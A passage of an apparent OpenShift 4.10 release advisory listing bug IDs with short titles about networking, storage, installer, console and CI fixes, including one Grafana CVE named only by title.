aws, gcp always fails with \"Error: Incompatible provider version\"\n2034248 - GPU/Host device modal is too small\n2034257 - regular user `Create VM` missing permissions alert\n2034285 - [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources [Serial] [Suite:openshift/conformance/serial]\n2034287 - do not block upgrades if we can\u0027t create storageclass in 4.10 in vsphere\n2034300 - Du validator policy is NonCompliant after DU configuration completed\n2034319 - Negation constraint is not validating packages\n2034322 - CNO doesn\u0027t pick up settings required when ExternalControlPlane topology\n2034350 - The CNO should implement the Whereabouts IP reconciliation cron job\n2034362 - update description of disk interface\n2034398 - The Whereabouts IPPools CRD should include the podref field\n2034409 - Default CatalogSources should be pointing to 4.10 index images\n2034410 - Metallb BGP, BFD: prometheus is not scraping the frr metrics\n2034413 - cloud-network-config-controller fails to init with secret \"cloud-credentials\" not found in manual credential mode\n2034460 - Summary: cloud-network-config-controller does not account for different environment\n2034474 - Template\u0027s boot source is \"Unknown source\" before and after set enableCommonBootImageImport to true\n2034477 - [OVN] Multiple EgressIP objects configured, EgressIPs weren\u0027t working properly\n2034493 - Change cluster version operator log level\n2034513 - [OVN] After update one EgressIP in EgressIP object, one internal IP lost from lr-policy-list\n2034527 - IPI deployment fails \u0027timeout reached while inspecting the node\u0027 when provisioning network ipv6\n2034528 - [IBM VPC] volumeBindingMode should be WaitForFirstConsumer\n2034534 - Update ose-machine-api-provider-openstack images to be consistent with ART\n2034537 - Update team\n2034559 - KubeAPIErrorBudgetBurn firing outside recommended latency thresholds\n2034563 - [Azure] create machine with wrong ephemeralStorageLocation value success\n2034577 - Current OVN gateway mode should be reflected on node annotation as well\n2034621 - context menu not popping up for application group\n2034622 - Allow volume expansion by default in vsphere CSI storageclass 4.10\n2034624 - Warn about unsupported CSI driver in vsphere operator\n2034647 - missing volumes list in snapshot modal\n2034648 - Rebase openshift-controller-manager to 1.23\n2034650 - Rebase openshift/builder to 1.23\n2034705 - vSphere: storage e2e tests logging configuration data\n2034743 - EgressIP: assigning the same egress IP to a second EgressIP object after a ovnkube-master restart does not fail. \n2034766 - Special Resource Operator(SRO) - no cert-manager pod created in dual stack environment\n2034785 - ptpconfig with summary_interval cannot be applied\n2034823 - RHEL9 should be starred in template list\n2034838 - An external router can inject routes if no service is added\n2034839 - Jenkins sync plugin does not synchronize ConfigMap having label role=jenkins-agent\n2034879 - Lifecycle hook\u0027s name and owner shouldn\u0027t be allowed to be empty\n2034881 - Cloud providers components should use K8s 1.23 dependencies\n2034884 - ART cannot build the image because it tries to download controller-gen\n2034889 - `oc adm prune deployments` does not work\n2034898 - Regression in recently added Events feature\n2034957 - update openshift-apiserver to kube 1.23.1\n2035015 - ClusterLogForwarding CR remains stuck remediating forever\n2035093 - openshift-cloud-network-config-controller never runs on Hypershift cluster\n2035141 - [RFE] Show GPU/Host devices in template\u0027s details tab\n2035146 - \"kubevirt-plugin~PVC cannot be empty\" shows on add-disk modal while adding existing PVC\n2035167 - [cloud-network-config-controller] unable to deleted cloudprivateipconfig when deleting\n2035199 - IPv6 support in mtu-migration-dispatcher.yaml\n2035239 - e2e-metal-ipi-virtualmedia tests are permanently failing\n2035250 - Peering with ebgp peer over multi-hops doesn\u0027t work\n2035264 - [RFE] Provide a proper message for nonpriv user who not able to add PCI devices\n2035315 - invalid test cases for AWS passthrough mode\n2035318 - Upgrade management workflow needs to allow custom upgrade graph path for disconnected env\n2035321 - Add Sprint 211 translations\n2035326 - [ExternalCloudProvider] installation with additional network on workers fails\n2035328 - Ccoctl does not ignore credentials request manifest marked for deletion\n2035333 - Kuryr orphans ports on 504 errors from Neutron\n2035348 - Fix two grammar issues in kubevirt-plugin.json strings\n2035393 - oc set data --dry-run=server makes persistent changes to configmaps and secrets\n2035409 - OLM E2E test depends on operator package that\u0027s no longer published\n2035439 - SDN Automatic assignment EgressIP on GCP returned node IP adress not egressIP address\n2035453 - [IPI on Alibabacloud] 2 worker machines stuck in Failed phase due to connection to \u0027ecs-cn-hangzhou.aliyuncs.com\u0027 timeout, although the specified region is \u0027us-east-1\u0027\n2035454 - [IPI on Alibabacloud] the OSS bucket created during installation for image registry is not deleted after destroying the cluster\n2035467 - UI: Queried metrics can\u0027t be ordered on Oberve-\u003eMetrics page\n2035494 - [SDN Migration]ovnkube-node pods CrashLoopBackOff after sdn migrated to ovn for RHEL workers\n2035515 - [IBMCLOUD] allowVolumeExpansion should be true in storage class\n2035602 - [e2e][automation] add tests for Virtualization Overview page cards\n2035703 - Roles -\u003e RoleBindings tab doesn\u0027t show RoleBindings correctly\n2035704 - RoleBindings list page filter doesn\u0027t apply\n2035705 - Azure \u0027Destroy cluster\u0027 get stuck when the cluster resource group is already not existing. \n2035757 - [IPI on Alibabacloud] one master node turned NotReady which leads to installation failed\n2035772 - AccessMode and VolumeMode is not reserved for customize wizard\n2035847 - Two dashes in the Cronjob / Job pod name\n2035859 - the output of opm render doesn\u0027t contain olm.constraint which is defined in dependencies.yaml\n2035882 - [BIOS setting values] Create events for all invalid settings in spec\n2035903 - One redundant capi-operator credential requests in \u201coc adm extract --credentials-requests\u201d\n2035910 - [UI] Manual approval options are missing after ODF 4.10 installation starts when Manual Update approval is chosen\n2035927 - Cannot enable HighNodeUtilization scheduler profile\n2035933 - volume mode and access mode are empty in customize wizard review tab\n2035969 - \"ip a \" shows \"Error: Peer netns reference is invalid\" after create test pods\n2035986 - Some pods under kube-scheduler/kube-controller-manager are using the deprecated annotation\n2036006 - [BIOS setting values] Attempt to set Integer parameter results in preparation error\n2036029 - New added cloud-network-config operator doesn\u2019t supported aws sts format credential\n2036096 - [azure-file-csi-driver] there are no e2e tests for NFS backend\n2036113 - cluster scaling new nodes ovs-configuration fails on all new nodes\n2036567 - [csi-driver-nfs] Upstream merge: Bump k8s libraries to 1.23\n2036569 - [cloud-provider-openstack] Upstream merge: Bump k8s libraries to 1.23\n2036577 - OCP 4.10 nightly builds from 4.10.0-0.nightly-s390x-2021-12-18-034912 to 4.10.0-0.nightly-s390x-2022-01-11-233015 fail to upgrade from OCP 4.9.11 and 4.9.12 for network type OVNKubernetes for zVM hypervisor environments\n2036622 - sdn-controller crashes when restarted while a previous egress IP assignment exists\n2036717 - Valid AlertmanagerConfig custom resource with valid a mute time interval definition is rejected\n2036826 - `oc adm prune deployments` can prune the RC/RS\n2036827 - The ccoctl still accepts CredentialsRequests without ServiceAccounts on GCP platform\n2036861 - kube-apiserver is degraded while enable multitenant\n2036937 - Command line tools page shows wrong download ODO link\n2036940 - oc registry login fails if the file is empty or stdout\n2036951 - [cluster-csi-snapshot-controller-operator] proxy settings is being injected in container\n2036989 - Route URL copy to clipboard button wraps to a separate line by itself\n2036990 - ZTP \"DU Done inform policy\" never becomes compliant on multi-node clusters\n2036993 - Machine API components should use Go lang version 1.17\n2037036 - The tuned profile goes into degraded status and ksm.service is displayed in the log. \n2037061 - aws and gcp CredentialsRequest manifests missing ServiceAccountNames list for cluster-api\n2037073 - Alertmanager container fails to start because of startup probe never being successful\n2037075 - Builds do not support CSI volumes\n2037167 - Some log level in ibm-vpc-block-csi-controller are hard code\n2037168 - IBM-specific Deployment manifest for package-server-manager should be excluded on non-IBM cluster-profiles\n2037182 - PingSource badge color is not matched with knativeEventing color\n2037203 - \"Running VMs\" card is too small in Virtualization Overview\n2037209 - [IPI on Alibabacloud] worker nodes are put in the default resource group unexpectedly\n2037237 - Add \"This is a CD-ROM boot source\" to customize wizard\n2037241 - default TTL for noobaa cache buckets should be 0\n2037246 - Cannot customize auto-update boot source\n2037276 - [IBMCLOUD] vpc-node-label-updater may fail to label nodes appropriately\n2037288 - Remove stale image reference\n2037331 - Ensure the ccoctl behaviors are similar between aws and gcp on the existing resources\n2037483 - Rbacs for Pods within the CBO should be more restrictive\n2037484 - Bump dependencies to k8s 1.23\n2037554 - Mismatched wave number error message should include the wave numbers that are in conflict\n2037622 - [4.10-Alibaba CSI driver][Restore size for volumesnapshot/volumesnapshotcontent is showing as 0 in Snapshot feature for Alibaba platform]\n2037635 - impossible to configure custom certs for default console route in ingress config\n2037637 - configure custom certificate for default console route doesn\u0027t take effect for OCP \u003e= 4.8\n2037638 - Builds do not support CSI volumes as volume sources\n2037664 - text formatting issue in Installed Operators list table\n2037680 - [IPI on Alibabacloud] sometimes operator \u0027cloud-controller-manager\u0027 tells empty VERSION, due to conflicts on listening tcp :8080\n2037689 - [IPI on Alibabacloud] sometimes operator \u0027cloud-controller-manager\u0027 tells empty VERSION, due to conflicts on listening tcp :8080\n2037801 - Serverless installation is failing on CI jobs for e2e tests\n2037813 - Metal Day 1 Networking - networkConfig Field Only Accepts String Format\n2037856 - use lease for leader election\n2037891 - 403 Forbidden error shows for all the graphs in each grafana dashboard after upgrade from 4.9 to 4.10\n2037903 - Alibaba Cloud: delete-ram-user requires the credentials-requests\n2037904 - upgrade operator deployment failed due to memory limit too low for manager container\n2038021 - [4.10-Alibaba CSI driver][Default volumesnapshot class is not added/present after successful cluster installation]\n2038034 - non-privileged user cannot see auto-update boot source\n2038053 - Bump dependencies to k8s 1.23\n2038088 - Remove ipa-downloader references\n2038160 - The `default` project missed the annotation : openshift.io/node-selector: \"\"\n2038166 - Starting from Go 1.17 invalid certificates will render a cluster non-functional\n2038196 - must-gather is missing collecting some metal3 resources\n2038240 - Error when configuring a file using permissions bigger than decimal 511 (octal 0777)\n2038253 - Validator Policies are long lived\n2038272 - Failures to build a PreprovisioningImage are not reported\n2038384 - Azure Default Instance Types are Incorrect\n2038389 - Failing test: [sig-arch] events should not repeat pathologically\n2038412 - Import page calls the git file list unnecessarily twice from GitHub/GitLab/Bitbucket\n2038465 - Upgrade chromedriver to 90.x to support Mac M1 chips\n2038481 - kube-controller-manager-guard and openshift-kube-scheduler-guard pods being deleted and restarted on a cordoned node when drained\n2038596 - Auto egressIP for OVN cluster on GCP: After egressIP object is deleted, egressIP still takes effect\n2038663 - update kubevirt-plugin OWNERS\n2038691 - [AUTH-8] Panic on user login when the user belongs to a group in the IdP side and the group already exists via \"oc adm groups new\"\n2038705 - Update ptp reviewers\n2038761 - Open Observe-\u003eTargets page, wait for a while, page become blank\n2038768 - All the filters on the Observe-\u003eTargets page can\u0027t work\n2038772 - Some monitors failed to display on Observe-\u003eTargets page\n2038793 - [SDN EgressIP] After reboot egress node, the egressip was lost from egress node\n2038827 - should add user containers in /etc/subuid and /etc/subgid to support run pods in user namespaces\n2038832 - New templates for centos stream8 are missing registry suggestions in create vm wizard\n2038840 - [SDN EgressIP]cloud-network-config-controller pod was CrashLoopBackOff after some operation\n2038864 - E2E tests fail because multi-hop-net was not created\n2038879 - All Builds are getting listed in DeploymentConfig under workloads on OpenShift Console\n2038934 - CSI driver operators should use the trusted CA bundle when cluster proxy is configured\n2038968 - Move feature gates from a carry patch to openshift/api\n2039056 - Layout issue with breadcrumbs on API explorer page\n2039057 - Kind column is not wide enough in API explorer page\n2039064 - Bulk Import e2e test flaking at a high rate\n2039065 - Diagnose and fix Bulk Import e2e test that was previously disabled\n2039085 - Cloud credential operator configuration failing to apply in hypershift/ROKS clusters\n2039099 - [OVN EgressIP GCP] After reboot egress node, egressip that was previously assigned got lost\n2039109 - [FJ OCP4.10 Bug]: startironic.sh failed to pull the image of image-customization container when behind a proxy\n2039119 - CVO hotloops on Service openshift-monitoring/cluster-monitoring-operator\n2039170 - [upgrade]Error shown on registry operator \"missing the cloud-provider-config configmap\" after upgrade\n2039227 - Improve image customization server parameter passing during installation\n2039241 - Improve image customization server parameter passing during installation\n2039244 - Helm Release revision history page crashes the UI\n2039294 - SDN controller metrics cannot be consumed correctly by prometheus\n2039311 - oc Does Not Describe Build CSI Volumes\n2039315 - Helm release list page should only fetch secrets for deployed charts\n2039321 - SDN controller metrics are not being consumed by prometheus\n2039330 - Create NMState button doesn\u0027t work in OperatorHub web console\n2039339 - cluster-ingress-operator should report Unupgradeable if user has modified the aws resources annotations\n2039345 - CNO does not verify the minimum MTU value for IPv6/dual-stack clusters. \n2039359 - `oc adm prune deployments` can\u0027t prune the RS where the associated Deployment no longer exists\n2039382 - gather_metallb_logs does not have execution permission\n2039406 - logout from rest session after vsphere operator sync is finished\n2039408 - Add GCP region northamerica-northeast2 to allowed regions\n2039414 - Cannot see the weights increased for NodeAffinity, InterPodAffinity, TaintandToleration\n2039425 - No need to set KlusterletAddonConfig CR applicationManager-\u003eenabled: true in RAN ztp deployment\n2039491 - oc - git:// protocol used in unit tests\n2039516 - Bump OVN to ovn21.12-21.12.0-25\n2039529 - Project Dashboard Resource Quotas Card empty state test flaking at a high rate\n2039534 - Diagnose and fix Project Dashboard Resource Quotas Card test that was previously disabled\n2039541 - Resolv-prepender script duplicating entries\n2039586 - [e2e] update centos8 to centos stream8\n2039618 - VM created from SAP HANA template leads to 404 page if leave one network parameter empty\n2039619 - [AWS] In tree provisioner storageclass aws disk type should contain \u0027gp3\u0027 and csi provisioner storageclass default aws disk type should be \u0027gp3\u0027\n2039670 - Create PDBs for control plane components\n2039678 - Page goes blank when create image pull secret\n2039689 - [IPI on Alibabacloud] Pay-by-specification NAT is no longer supported\n2039743 - React missing key warning when open operator hub detail page (and maybe others as well)\n2039756 - React missing key warning when open KnativeServing details\n2039770 - Observe dashboard doesn\u0027t react on time-range changes after browser reload when perspective is changed in another tab\n2039776 - Observe dashboard shows nothing if the URL links to an non existing dashboard\n2039781 - [GSS] OBC is not visible by admin of a Project on Console\n2039798 - Contextual binding with Operator backed service creates visual connector instead of Service binding connector\n2039868 - Insights Advisor widget is not in the disabled state when the Insights Operator is disabled\n2039880 - Log level too low for control plane metrics\n2039919 - Add E2E test for router compression feature\n2039981 - ZTP for standard clusters installs stalld on master nodes\n2040132 - Flag --port has been deprecated, This flag has no effect now and will be removed in v1.24. You can use --secure-port instead\n2040136 - external-dns-operator pod keeps restarting and reports error: timed out waiting for cache to be synced\n2040143 - [IPI on Alibabacloud] suggest to remove region \"cn-nanjing\" or provide better error message\n2040150 - Update ConfigMap keys for IBM HPCS\n2040160 - [IPI on Alibabacloud] installation fails when region does not support pay-by-bandwidth\n2040285 - Bump build-machinery-go for console-operator to pickup change in yaml-patch repository\n2040357 - bump OVN to ovn-2021-21.12.0-11.el8fdp\n2040376 - \"unknown instance type\" error for supported m6i.xlarge instance\n2040394 - Controller: enqueue the failed configmap till services update\n2040467 - Cannot build ztp-site-generator container image\n2040504 - Change AWS EBS GP3 IOPS in MachineSet doesn\u0027t take affect in OpenShift 4\n2040521 - RouterCertsDegraded certificate could not validate route hostname v4-0-config-system-custom-router-certs.apps\n2040535 - Auto-update boot source is not available in customize wizard\n2040540 - ovs hardware offload: ovsargs format error when adding vf netdev name\n2040603 - rhel worker scaleup playbook failed because missing some dependency of podman\n2040616 - rolebindings page doesn\u0027t load for normal users\n2040620 - [MAPO] Error pulling MAPO image on installation\n2040653 - Topology sidebar warns that another component is updated while rendering\n2040655 - User settings update fails when selecting application in topology sidebar\n2040661 - Different react warnings about updating state on unmounted components when leaving topology\n2040670 - Permafailing CI job: periodic-ci-openshift-release-master-nightly-4.10-e2e-gcp-libvirt-cert-rotation\n2040671 - [Feature:IPv6DualStack] most tests are failing in dualstack ipi\n2040694 - Three upstream HTTPClientConfig struct fields missing in the operator\n2040705 - Du policy for standard cluster runs the PTP daemon on masters and workers\n2040710 - cluster-baremetal-operator cannot update BMC subscription CR\n2040741 - Add CI test(s) to ensure that metal3 components are deployed in vSphere, OpenStack and None platforms\n2040782 - Import YAML page blocks input with more then one generateName attribute\n2040783 - The Import from YAML summary page doesn\u0027t show the resource name if created via generateName attribute\n2040791 - Default PGT policies must be \u0027inform\u0027 to integrate with the Lifecycle Operator\n2040793 - Fix snapshot e2e failures\n2040880 - do not block upgrades if we can\u0027t connect to vcenter\n2041087 - MetalLB: MetalLB CR is not upgraded automatically from 4.9 to 4.10\n2041093 - autounattend.xml missing\n2041204 - link to templates in virtualization-cluster-overview inventory card is to all templates\n2041319 - [IPI on Alibabacloud] installation in region \"cn-shanghai\" failed, due to \"Resource alicloud_vswitch CreateVSwitch Failed...InvalidCidrBlock.Overlapped\"\n2041326 - Should bump cluster-kube-descheduler-operator to kubernetes version V1.23\n2041329 - aws and gcp CredentialsRequest manifests missing ServiceAccountNames list for cloud-network-config-controller\n2041361 - [IPI on Alibabacloud] Disable session persistence and removebBandwidth peak of listener\n2041441 - Provision volume with size 3000Gi even if sizeRange: \u0027[10-2000]GiB\u0027 in storageclass on IBM cloud\n2041466 - Kubedescheduler version is missing from the operator logs\n2041475 - React components should have a (mostly) unique name in react dev tools to simplify code analyses\n2041483 - MetallB: quay.io/openshift/origin-kube-rbac-proxy:4.10 deploy Metallb CR is missing (controller and speaker pods)\n2041492 - Spacing between resources in inventory card is too small\n2041509 - GCP Cloud provider components should use K8s 1.23 dependencies\n2041510 - cluster-baremetal-operator doesn\u0027t run baremetal-operator\u0027s subscription webhook\n2041541 - audit: ManagedFields are dropped using API not annotation\n2041546 - ovnkube: set election timer at RAFT cluster creation time\n2041554 - use lease for leader election\n2041581 - KubeDescheduler operator log shows \"Use of insecure cipher detected\"\n2041583 - etcd and api server cpu mask interferes with a guaranteed workload\n2041598 - Including CA bundle in Azure Stack cloud config causes MCO failure\n2041605 - Dynamic Plugins: discrepancy in proxy alias documentation/implementation\n2041620 - bundle CSV alm-examples does not parse\n2041641 - Fix inotify leak and kubelet retaining memory\n2041671 - Delete templates leads to 404 page\n2041694 - [IPI on Alibabacloud] installation fails when region does not support the cloud_essd disk category\n2041734 - ovs hwol: VFs are unbind when switchdev mode is enabled\n2041750 - [IPI on Alibabacloud] trying \"create install-config\" with region \"cn-wulanchabu (China (Ulanqab))\" (or \"ap-southeast-6 (Philippines (Manila))\", \"cn-guangzhou (China (Guangzhou))\") failed due to invalid endpoint\n2041763 - The Observe \u003e Alerting pages no longer have their default sort order applied\n2041830 - CI: ovn-kubernetes-master-e2e-aws-ovn-windows is broken\n2041854 - Communities / Local prefs are applied to all the services regardless of the pool, and only one community is applied\n2041882 - cloud-network-config operator can\u0027t work normal on GCP workload identity cluster\n2041888 - Intermittent incorrect build to run correlation, leading to run status updates applied to wrong build, builds stuck in non-terminal phases\n2041926 - [IPI on Alibabacloud] Installer ignores public zone when it does not exist\n2041971 - [vsphere] Reconciliation of mutating webhooks didn\u0027t happen\n2041989 - CredentialsRequest manifests being installed for ibm-cloud-managed profile\n2041999 - [PROXY] external dns pod cannot recognize custom proxy CA\n2042001 - unexpectedly found multiple load balancers\n2042029 - kubedescheduler fails to install completely\n2042036 - [IBMCLOUD] \"openshift-install explain installconfig.platform.ibmcloud\" contains not yet supported custom vpc parameters\n2042049 - Seeing warning related to unrecognized feature gate in kubescheduler \u0026 KCM logs\n2042059 - update discovery burst to reflect lots of CRDs on openshift clusters\n2042069 - Revert toolbox to rhcos-toolbox\n2042169 - Can not delete egressnetworkpolicy in Foreground propagation\n2042181 - MetalLB: User should not be allowed add same bgp advertisement twice in BGP address pool\n2042265 - [IBM]\"--scale-down-utilization-threshold\" doesn\u0027t work on IBMCloud\n2042274 - Storage API should be used when creating a PVC\n2042315 - Baremetal IPI deployment with IPv6 control plane and disabled provisioning network fails as the nodes do not pass introspection\n2042366 - Lifecycle hooks should be independently managed\n2042370 - [IPI on Alibabacloud] installer panics when the zone does not have an enhanced NAT gateway\n2042382 - [e2e][automation] CI takes more then 2 hours to run\n2042395 - Add prerequisites for active health checks test\n2042438 - Missing rpms in openstack-installer image\n2042466 - Selection does not happen when switching from Topology Graph to List View\n2042493 - No way to verify if IPs with leading zeros are still valid in the apiserver\n2042567 - insufficient info on CodeReady Containers configuration\n2042600 - Alone, the io.kubernetes.cri-o.Devices option poses a security risk\n2042619 - Overview page of the console is broken for hypershift clusters\n2042655 - [IPI on Alibabacloud] cluster becomes unusable if there is only one kube-apiserver pod running\n2042711 - [IBMCloud] Machine Deletion Hook cannot work on IBMCloud\n2042715 - [AliCloud] Machine Deletion Hook cannot work on AliCloud\n2042770 - [IPI on Alibabacloud] with vpcID \u0026 vswitchIDs specified, the installer would still try creating NAT gateway unexpectedly\n2042829 - Topology performance: HPA was fetched for each Deployment (Pod Ring)\n2042851 - Create template from SAP HANA template flow - VM is created instead of a new template\n2042906 - Edit machineset with same machine deletion hook name succeed\n2042960 - azure-file CI fails with \"gid(0) in storageClass and pod fsgroup(1000) are not equal\"\n2043003 - [IPI on Alibabacloud] \u0027destroy cluster\u0027 of a failed installation (bug2041694) stuck after \u0027stage=Nat gateways\u0027\n2043042 - [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]\n2043043 - Cluster Autoscaler should use K8s 1.23 dependencies\n2043064 - Topology performance: Unnecessary rerenderings in topology nodes (unchanged mobx props)\n2043078 - Favorite system projects not visible in the project selector after toggling \"Show default projects\". \n2043117 - Recommended operators links are erroneously treated as external\n2043130 - Update CSI sidecars to the latest release for 4.10\n2043234 - Missing validation when creating several BGPPeers with the same peerAddress\n2043240 - Sync openshift/descheduler with sigs.k8s.io/descheduler\n2043254 - crio does not bind the security profiles directory\n2043296 - Ignition fails when reusing existing statically-keyed LUKS volume\n2043297 - [4.10] Bootimage bump tracker\n2043316 - RHCOS VM fails to boot on Nutanix AOS\n2043446 - Rebase aws-efs-utils to the latest upstream version. \n2043556 - Add proper ci-operator configuration to ironic and ironic-agent images\n2043577 - DPU network operator\n2043651 - Fix bug with exp. backoff working correcly when setting nextCheck in vsphere operator\n2043675 - Too many machines deleted by cluster autoscaler when scaling down\n2043683 - Revert bug 2039344 Ignoring IPv6 addresses against etcd cert validation\n2043709 - Logging flags no longer being bound to command line\n2043721 - Installer bootstrap hosts using outdated kubelet containing bugs\n2043731 - [IBMCloud] terraform outputs missing for ibmcloud bootstrap and worker ips for must-gather\n2043759 - Bump cluster-ingress-operator to k8s.io/api 1.23\n2043780 - Bump router to k8s.io/api 1.23\n2043787 - Bump cluster-dns-operator to k8s.io/api 1.23\n2043801 - Bump CoreDNS to k8s.io/api 1.23\n2043802 - EgressIP stopped working after single egressIP for a netnamespace is switched to the other node of HA pair after the first egress node is shutdown\n2043961 - [OVN-K] If pod creation fails, retry doesn\u0027t work as expected. \n2044201 - Templates golden image parameters names should be supported\n2044244 - Builds are failing after upgrading the cluster with builder image [jboss-webserver-5/jws56-openjdk8-openshift-rhel8]\n2044248 - [IBMCloud][vpc.block.csi.ibm.io]Cluster common user use the storageclass without parameter \u201ccsi.storage.k8s.io/fstype\u201d create pvc,pod successfully but write data to the pod\u0027s volume failed of \"Permission denied\"\n2044303 - [ovn][cloud-network-config-controller] cloudprivateipconfigs ips were left after deleting egressip objects\n2044347 - Bump to kubernetes 1.23.3\n2044481 - collect sharedresource cluster scoped instances with must-gather\n2044496 - Unable to create hardware events subscription - failed to add finalizers\n2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources\n2044680 - Additional libovsdb performance and resource consumption fixes\n2044704 - Observe \u003e Alerting pages should not show runbook links in 4.10\n2044717 - [e2e] improve tests for upstream test environment\n2044724 - Remove namespace column on VM list page when a project is selected\n2044745 - Upgrading cluster from 4.9 to 4.10 on Azure (ARO) causes the cloud-network-config-controller pod to CrashLoopBackOff\n2044808 - machine-config-daemon-pull.service: use `cp` instead of `cat` when extracting MCD in OKD\n2045024 - CustomNoUpgrade alerts should be ignored\n2045112 - vsphere-problem-detector has missing rbac rules for leases\n2045199 - SnapShot with Disk Hot-plug hangs\n2045561 - Cluster Autoscaler should use the same default Group value as Cluster API\n2045591 - Reconciliation of aws pod identity mutating webhook did not happen\n2045849 - Add Sprint 212 translations\n2045866 - MCO Operator pod spam \"Error creating event\" warning messages in 4.10\n2045878 - Sync upstream 1.16.0 downstream; includes hybrid helm plugin\n2045916 - [IBMCloud] Default machine profile in installer is unreliable\n2045927 - [FJ OCP4.10 Bug]: Podman failed to pull the IPA image due to the loss of proxy environment\n2046025 - [IPI on Alibabacloud] pre-configured alicloud DNS private zone is deleted after destroying cluster, please clarify\n2046137 - oc output for unknown commands is not human readable\n2046296 - When creating multiple consecutive egressIPs on GCP not all of them get assigned to the instance\n2046297 - Bump DB reconnect timeout\n2046517 - In Notification drawer, the \"Recommendations\" header shows when there isn\u0027t any recommendations\n2046597 - Observe \u003e Targets page may show the wrong service monitor is multiple monitors have the same namespace \u0026 label selectors\n2046626 - Allow setting custom metrics for Ansible-based Operators\n2046683 - [AliCloud]\"--scale-down-utilization-threshold\" doesn\u0027t work on AliCloud\n2047025 - Installation fails because of Alibaba CSI driver operator is degraded\n2047190 - Bump Alibaba CSI driver for 4.10\n2047238 - When using communities and localpreferences together, only localpreference gets applied\n2047255 - alibaba: resourceGroupID not found\n2047258 - [aws-usgov] fatal error occurred if AMI is not provided for AWS GovCloud regions\n2047317 - Update HELM OWNERS files under Dev Console\n2047455 - [IBM Cloud] Update custom image os type\n2047496 - Add image digest feature\n2047779 - do not degrade cluster if storagepolicy creation fails\n2047927 - \u0027oc get project\u0027 caused \u0027Observed a panic: cannot deep copy core.NamespacePhase\u0027 when AllRequestBodies is used\n2047929 - use lease for leader election\n2047975 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n2048046 - New route annotation to show another URL or hide topology URL decorator doesn\u0027t work for Knative Services\n2048048 - Application tab in User Preferences dropdown menus are too wide. \n2048050 - Topology list view items are not highlighted on keyboard navigation\n2048117 - [IBM]Shouldn\u0027t change status.storage.bucket and status.storage.resourceKeyCRN when update sepc.stroage,ibmcos with invalid value\n2048413 - Bond CNI: Failed to attach Bond NAD to pod\n2048443 - Image registry operator panics when finalizes config deletion\n2048478 - [alicloud] CCM deploys alibaba-cloud-controller-manager from quay.io/openshift/origin-*\n2048484 - SNO: cluster-policy-controller failed to start due to missing serving-cert/tls.crt\n2048598 - Web terminal view is broken\n2048836 - ovs-configure mis-detecting the ipv6 status on IPv4 only cluster causing Deployment failure\n2048891 - Topology page is crashed\n2049003 - 4.10: [IBMCloud] ibm-vpc-block-csi-node does not specify an update strategy, only resource requests, or priority class\n2049043 - Cannot create VM from template\n2049156 - \u0027oc get project\u0027 caused \u0027Observed a panic: cannot deep copy core.NamespacePhase\u0027 when AllRequestBodies is used\n2049886 - Placeholder bug for OCP 4.10.0 metadata release\n2049890 - Warning annotation for pods with cpu requests or limits on single-node OpenShift cluster without workload partitioning\n2050189 - [aws-efs-csi-driver] Merge upstream changes since v1.3.2\n2050190 - [aws-ebs-csi-driver] Merge upstream changes since v1.2.0\n2050227 - Installation on PSI fails with: \u0027openstack platform does not have the required standard-attr-tag network extension\u0027\n2050247 - Failing test in periodics: [sig-network] Services should respect internalTrafficPolicy=Local Pod and Node, to Pod (hostNetwork: true) [Feature:ServiceInternalTrafficPolicy] [Skipped:Network/OVNKubernetes] [Suite:openshift/conformance/parallel] [Suite:k8s]\n2050250 - Install fails to bootstrap, complaining about DefragControllerDegraded and sad members\n2050310 - ContainerCreateError when trying to launch large (\u003e500) numbers of pods across nodes\n2050370 - alert data for burn budget needs to be updated to prevent regression\n2050393 - ZTP missing support for local image registry and custom machine config\n2050557 - Can not push images to image-registry when enabling KMS encryption in AlibabaCloud\n2050737 - Remove metrics and events for master port offsets\n2050801 - Vsphere upi tries to access vsphere during manifests generation phase\n2050883 - Logger object in LSO does not log source location accurately\n2051692 - co/image-registry is degrade because ImagePrunerDegraded: Job has reached the specified backoff limit\n2052062 - Whereabouts should implement client-go 1.22+\n2052125 - [4.10] Crio appears to be coredumping in some scenarios\n2052210 - [aws-c2s] kube-apiserver crashloops due to missing cloud config\n2052339 - Failing webhooks will block an upgrade to 4.10 mid-way through the upgrade. \n2052458 - [IBM Cloud] ibm-vpc-block-csi-controller does not specify an update strategy, priority class, or only resource requests\n2052598 - kube-scheduler should use configmap lease\n2052599 - kube-controller-manger should use configmap lease\n2052600 - Failed to scaleup RHEL machine against OVN cluster due to jq tool is required by configure-ovs.sh\n2052609 - [vSphere CSI driver Operator] RWX volumes counts metrics `vsphere_rwx_volumes_total` not valid\n2052611 - MetalLB: BGPPeer object does not have ability to set ebgpMultiHop\n2052612 - MetalLB: Webhook Validation: Two BGPPeers instances can have different router ID set. \n2052644 - Infinite OAuth redirect loop post-upgrade to 4.10.0-rc.1\n2052666 - [4.10.z] change gitmodules to rhcos-4.10 branch\n2052756 - [4.10] PVs are not being cleaned up after PVC deletion\n2053175 - oc adm catalog mirror throws \u0027missing signature key\u0027 error when using file://local/index\n2053218 - ImagePull fails with error \"unable to pull manifest from example.com/busy.box:v5 invalid reference format\"\n2053252 - Sidepanel for Connectors/workloads in topology shows invalid tabs\n2053268 - inability to detect static lifecycle failure\n2053314 - requestheader IDP test doesn\u0027t wait for cleanup, causing high failure rates\n2053323 - OpenShift-Ansible BYOH Unit Tests are Broken\n2053339 - Remove dev preview badge from IBM FlashSystem deployment windows\n2053751 - ztp-site-generate container is missing convenience entrypoint\n2053945 - [4.10] Failed to apply sriov policy on intel nics\n2054109 - Missing \"app\" label\n2054154 - RoleBinding in project without subject is causing \"Project access\" page to fail\n2054244 - Latest pipeline run should be listed on the top of the pipeline run list\n2054288 - console-master-e2e-gcp-console is broken\n2054562 - DPU network operator 4.10 branch need to sync with master\n2054897 - Unable to deploy hw-event-proxy operator\n2055193 - e2e-metal-ipi-serial-ovn-ipv6 is failing frequently\n2055358 - Summary Interval Hardcoded in PTP Operator if Set in the Global Body Instead of Command Line\n2055371 - Remove Check which enforces summary_interval must match logSyncInterval\n2055689 - [ibm]Operator storage PROGRESSING and DEGRADED is true during fresh install for ocp4.11\n2055894 - CCO mint mode will not work for Azure after sunsetting of Active Directory Graph API\n2056441 - AWS EFS CSI driver should use the trusted CA bundle when cluster proxy is 